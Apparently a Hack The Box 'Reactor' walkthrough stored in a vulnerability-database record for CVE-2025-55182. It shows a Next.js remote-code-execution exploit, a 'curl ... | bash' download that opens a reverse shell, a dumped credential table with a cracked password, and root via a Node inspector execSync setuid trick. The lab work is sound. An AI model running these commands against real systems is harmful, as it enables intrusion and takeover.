{"uuid": "2b8ae3dc-90f9-48d3-a321-0d6f246b652c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55182", "type": "seen", "source": "https://gist.github.com/byt3n33dl3/bd0aa49b7cae59f46c862ebb468d17bf", "content": "## HTB REACTOR - Linux (Easy)\n\n1. Network Enumeration\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ping -c2 10.129.12.203\nPING 10.129.12.203 (10.129.12.203) 56(84) bytes of data.\n64 bytes from 10.129.12.203: icmp_seq=1 ttl=63 time=244 ms\n64 bytes from 10.129.12.203: icmp_seq=2 ttl=63 time=243 ms\n\n--- 10.129.12.203 ping statistics ---\n2 packets transmitted, 2 received, 0% packet loss, time 1006ms\nrtt min/avg/max/mdev = 243.382/243.762/244.143/0.380 ms\n```\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo nmap -Pn -p- --min-rate 8000 10.129.12.203 -oA nmap/nmap\nStarting Nmap 7.98 ( https://nmap.org ) at \nNmap scan report for 10.129.12.203\nHost is up (0.24s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT     STATE SERVICE\n22/tcp   open  ssh\n3000/tcp open  ppp\n\nNmap done: 1 IP address (1 host up) scanned in seconds\n```\n                                                                                                 \n```                                                                                                 \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo nmap -Pn -p22,3000 -sC -sV 10.129.12.203 -oA nmap/nmap-port\nStarting Nmap 7.98 ( https://nmap.org ) at\nNmap scan report for 10.129.12.203\nHost is up (0.24s latency).\n\nPORT     STATE SERVICE VERSION\n22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 ce:fd:0d:82:c0:23:ed:6e:4b:ea:13:fa:4f:ea:ef:b7 (ECDSA)\n|_  256 f8:44:c6:46:58:7a:39:21:ef:16:44:e9:58:c2:f3:62 (ED25519)\n3000/tcp open  ppp?\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP/1.1 200 OK\n|     
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding\n|     x-nextjs-cache: HIT\n|     x-nextjs-prerender: 1\n|     x-nextjs-stale-time: 4294967294\n|     X-Powered-By: Next.js\n|     Cache-Control: s-maxage=31536000, \n|     ETag: \"p02u6gnhufd8t\"\n|     Content-Type: text/html; charset=utf-8\n|     Content-Length: 17175\n|     Date: Wed, 03 Jun 2026 15:05:00 GMT\n|     Connection: close\n|     \n```\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo python3 CVE-2025-55182.py -t http://10.129.12.203:3000/ -c \"id\" \n\n    .______       _______     ___       ______ .___________. __   __       _______. __    __   _______  __       __      \n    |   _  \\     |   ____|   /   \\     /      ||           ||  | |  |     /       ||  |  |  | |   ____||  |     |  |     \n    |  |_)  |    |  |__     /  ^  \\   |  ,----'`---|  |----`|  | |  |    |   (----`|  |__|  | |  |__   |  |     |  |     \n    |      /     |   __|   /  /_\\  \\  |  |         |  |     |  | |  |     \\   \\    |   __   | |   __|  |  |     |  |     \n    |  |\\  \\----.|  |____ /  _____  \\ |  `----.    |  |     |  | |  | .----)   |   |  |  |  | |  |____ |  `----.|  `----.\n    | _| `._____||_______/__/     \\__\\ \\______|    |__|     |__| |__| |_______/    |__|  |__| |_______||_______||_______|\n    \n[*] Target: http://10.129.12.203:3000/\n[*] Command: id\n\n[+] SUCCESS!\n\nuid=999(node) gid=988(node) groups=988(node)\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo python3 CVE-2025-55182.py -t http://10.129.12.203:3000/ -c \"curl http://10.10.15.113/s.sh|bash\" \n\n    .______       _______     ___       ______ .___________. __   __       _______. 
__    __   _______  __       __      \n    |   _  \\     |   ____|   /   \\     /      ||           ||  | |  |     /       ||  |  |  | |   ____||  |     |  |     \n    |  |_)  |    |  |__     /  ^  \\   |  ,----'`---|  |----`|  | |  |    |   (----`|  |__|  | |  |__   |  |     |  |     \n    |      /     |   __|   /  /_\\  \\  |  |         |  |     |  | |  |     \\   \\    |   __   | |   __|  |  |     |  |     \n    |  |\\  \\----.|  |____ /  _____  \\ |  `----.    |  |     |  | |  | .----)   |   |  |  |  | |  |____ |  `----.|  `----.\n    | _| `._____||_______/__/     \\__\\ \\______|    |__|     |__| |__| |_______/    |__|  |__| |_______||_______||_______|\n    \n[*] Target: http://10.129.12.203:3000/\n[*] Command: curl http://10.10.15.113/s.sh|bash\n\n[+] SUCCESS!\n\n1224254375\n```\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo nc -lvnp 9001\nlistening on [any] 9001 ...\nconnect to [10.10.15.113] from (UNKNOWN) [10.129.12.203] 34248\nbash: cannot set terminal process group (1273): Inappropriate ioctl for device\nbash: no job control in this shell\nnode@reactor:/opt/reactor-app$ id\nid\nuid=999(node) gid=988(node) groups=988(node)\nnode@reactor:/opt/reactor-app$ cd /home\ncd /home\nnode@reactor:/home$ ls -al\nls -al\ntotal 16\ndrwxr-xr-x  4 root     root     4096 May 18 11:40 .\ndrwxr-xr-x 23 root     root     4096 May 20 10:07 ..\ndrwxr-x---  4 engineer engineer 4096 May 20 10:12 engineer\ndrwxr-x---  2 node     node     4096 May 18 11:40 node\nnode@reactor:/home$ cd engineer\ncd engineer\nbash: cd: engineer: Permission denied\nnode@reactor:/home$ cd node\ncd node\nnode@reactor:~$ ls -al\nls -al\ntotal 20\ndrwxr-x--- 2 node node 4096 May 18 11:40 .\ndrwxr-xr-x 4 root root 4096 May 18 11:40 ..\nlrwxrwxrwx 1 root root    9 May 18 10:38 .bash_history -> /dev/null\n-rw-r--r-- 1 node node  220 Mar 31  2024 .bash_logout\n-rw-r--r-- 1 node node 3771 Mar 31  2024 .bashrc\n-rw-r--r-- 1 node node  807 Mar 31  2024 
.profile\nnode@reactor:~$\n```\n\n4. Dump Database for Local User\n\n```\nnode@reactor:/opt/reactor-app$ which sqlite3\nwhich sqlite3\n/usr/bin/sqlite3\nnode@reactor:/opt/reactor-app$ sqlite3 reactor.db .dump\nsqlite3 reactor.db .dump\n. . .[SNIP]. . .\n);\nINSERT INTO users VALUES(1,'admin','a203b22191d744a4e70ada5c101b17b8','administrator','admin@reactor.htb');\nINSERT INTO users VALUES(2,'engineer','39d97110eafe2a9a68639812cd271e8e','operator','engineer@reactor.htb');\nCREATE TABLE sensor_logs (\n    id INTEGER PRIMARY KEY,\n    timestamp DATETIME DEFAULT CURRENT_TIMESTAMP,\n    sensor_id TEXT,\n    reading REAL,\n    status TEXT\n);\nINSERT INTO sensor_logs VALUES(1,'2025-12-28 14:32:01','CORE_TEMP_01',324.5,'NOMINAL');\nINSERT INTO sensor_logs VALUES(2,'2025-12-28 14:32:01','PRESSURE_01',155.199999999999988,'NOMINAL');\nINSERT INTO sensor_logs VALUES(3,'2025-12-28 14:32:01','COOLANT_FLOW',18.3999999999999985,'CAUTION');\nCOMMIT;\nnode@reactor:/opt/reactor-app$\n```\n\n\n\nPS: Engineer passwd is cracked!\n\n```\nengineer:reactor1\n```\n\n5. Local User Access\n\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo netexec ssh 10.129.12.203 -u engineer -p reactor1                                            \nSSH         10.129.12.203   22     10.129.12.203    [*] SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.16\nSSH         10.129.12.203   22     10.129.12.203    [+] engineer:reactor1  Linux - Shell access!\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo ssh engineer@10.129.12.203\nengineer@10.129.12.203's password: \n ____  _____    _    ____ _____ ___  ____  \n|  _ \\| ____|  / \\  / ___|_   _/ _ \\|  _ \\ \n| |_) |  _|   / _ \\| |     | || | | | |_) |\n|  _ <| |___ / ___ \\ |___  | || |_| |  _ < \n|_| \\_\\_____/_/   \\_\\____| |_| \\___/|_| \\_\\\n\n    ReactorWatch Core Monitoring System\n    Nuclear Dynamics Corp. 
- Site 7\n    \n    AUTHORIZED PERSONNEL ONLY\nLast login: Wed Jun 3 15:14:48 2026 from 10.10.15.113\nengineer@reactor:~$ id\nuid=1000(engineer) gid=1000(engineer) groups=1000(engineer),4(adm),24(cdrom),30(dip),46(plugdev),101(lxd)\nengineer@reactor:~$\n```\n\n6. Privilege Escalation\n\n```\nengineer@reactor:~$ ss -tunlp\nNetid                   State                    Recv-Q                   Send-Q                                     Local Address:Port                                       Peer Address:Port                   Process                   \nudp                     UNCONN                   0                        0                                             127.0.0.54:53                                              0.0.0.0:*                                                \nudp                     UNCONN                   0                        0                                          127.0.0.53%lo:53                                              0.0.0.0:*                                                \nudp                     UNCONN                   0                        0                                                0.0.0.0:68                                              0.0.0.0:*                                                \ntcp                     LISTEN                   0                        511                                            127.0.0.1:9229                                            0.0.0.0:*                                                \ntcp                     LISTEN                   0                        4096                                          127.0.0.54:53                                              0.0.0.0:*                                                \ntcp                     LISTEN                   0                        4096                                       127.0.0.53%lo:53                                              0.0.0.0:*                                                \ntcp       
              LISTEN                   0                        4096                                             0.0.0.0:22                                              0.0.0.0:*                                                \ntcp                     LISTEN                   0                        511                                                    *:3000                                                  *:*                                                \ntcp                     LISTEN                   0                        4096                                                [::]:22                                                 [::]:*                                                \nengineer@reactor:~$ which node\n/usr/bin/node\n```\n\n```\nengineer@reactor:~$ ps aux | grep node\nnode        1273 14.8  3.7 11831056 147108 ?     Ssl  15:02   2:14 next-server (v15.0.3)\nroot        1291  0.0  1.1 1066320 46176 ?       Ssl  15:02   0:00 /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js\nengineer    1725  0.0  0.0   6544  2280 pts/0    S+   15:17   0:00 grep --color=auto node\nengineer@reactor:~$\n```\n\n```\nengineer@reactor:~$ /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js\nStarting inspector on 127.0.0.1:9229 failed: address already in use\nuptime-monitor up, pid=1726\nnode:fs:2380\n    return binding.writeFileUtf8(\n                   ^\n\nError: EACCES: permission denied, open '/var/log/uptime-monitor.csv'\n    at Object.writeFileSync (node:fs:2380:20)\n. . .[SNIP]. . .\n  errno: -13,\n  code: 'EACCES',\n  syscall: 'open',\n  path: '/var/log/uptime-monitor.csv'\n}\n\nNode.js v20.20.2\nengineer@reactor:~$\n```\n\nChecking UID:\n\n```\nengineer@reactor:~$ node inspect 127.0.0.1:9229\nconnecting to 127.0.0.1:9229 ... 
ok\ndebug> exec(\"process.getuid()\")\n0\n\nAttack:\ndebug> exec(\"process.mainModule.require('child_process').execSync('cp /bin/bash /tmp/r00t && chmod +s /tmp/r00t')\")\nUint8Array(0)\n```\nExit\n```\nengineer@reactor:~$ cd /tmp\nengineer@reactor:/tmp$ ls -al\ntotal 1476\ndrwxrwxrwt 15 root root    4096 Jun  3 15:19 .\ndrwxr-xr-x 23 root root    4096 May 20 10:07 ..\ndrwxrwxrwt  2 root root    4096 Jun  3 15:02 .font-unix\ndrwxrwxrwt  2 root root    4096 Jun  3 15:02 .ICE-unix\n-rwsr-sr-x  1 root root 1446024 Jun  3 15:19 r00t\n. . .[SNIP]. . .\ndrwx------  2 root root    4096 Jun  3 15:03 vmware-root_727-4290690966\ndrwxrwxrwt  2 root root    4096 Jun  3 15:02 .X11-unix\ndrwxrwxrwt  2 root root    4096 Jun  3 15:02 .XIM-unix\nengineer@reactor:/tmp$ /tmp/r00t -p\nr00t-5.2# id\nuid=1000(engineer) gid=1000(engineer) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),101(lxd),1000(engineer)\nr00t-5.2# cd /root\nr00t-5.2# ls -al\ntotal 44\ndrwx------  7 root root 4096 Jun  3 15:02 .\ndrwxr-xr-x 23 root root 4096 May 20 10:07 ..\n-rw-------  1 root root    0 May 20 10:12 .bash_history\n. . .[SNIP]. . .\n-rw-r--r--  1 root root  161 Apr 22  2024 .profile\n-rw-r-----  1 root root   33 Jun  3 15:02 root.txt\ndrwx------  2 root root 4096 Dec 28 20:30 .ssh\nr00t-5.2# whoami\nroot\n```\n\n### Done!\n- ", "creation_timestamp": "2026-06-03T15:34:27.000000Z"}